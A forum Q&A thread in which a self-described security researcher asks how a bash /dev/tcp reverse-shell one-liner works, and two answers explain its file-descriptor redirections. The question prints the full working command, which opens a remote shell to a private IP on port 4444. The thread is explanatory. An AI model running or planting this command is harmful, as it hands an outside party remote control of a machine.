# How is this command redirection working?

Tags: shell, command-line, security

I am doing some security research and I was wondering how the following snippet works on Unix based OS's:

`exec 5<>/dev/tcp/192.168.159.150/4444; cat <&5 | while read line; do \$line 2>&5 >&5; echo -n \$(pwd)'# ' >&5; done`

I am totally aware of *what* this code does (ie establish a reverse shell to 192.168.159.150 over port 4444) but I don't understand what these sections are doing:

- `exec 5<>`
- `cat <&5`
- `2>&5 >&5`

And just in general how this how thing fits together to produce the shell that I see.

Could anyone help explain this or point me in the right direction to understanding this?

Thanks

Comment: [Useless use of `cat`](http://porkmail.org/era/unix/award.html#cat).

Answer (score 3, accepted):

Some parts of your question are answered [here](https://stackoverflow.com/questions/7082001/file-descriptors)

But

1. This define new filedescriptor with number 5. BTW 0 is STDIN, 1 is
   STDOUT, 2 is STDERR filedescriptors
2. Echo the information, which is received via TCP, IP 192.168.159.150,
   port 4444
3. Send STDERR and STDOUT to filehandler 5 i.e network

Answer (score 5):

A quick rundown:

`exec 5<>` is opening a new file handle for both reading and writing and then naming it `5`

`cat <&5` is reading from that newly opened file handle

`2>&5 >&5` is redirecting the output of both file handle `2` (stderr) and file handle `1` (stdout) to file handle `5`.  The `1` in this case is implied since a file handle number wasn't provided on the second redirection.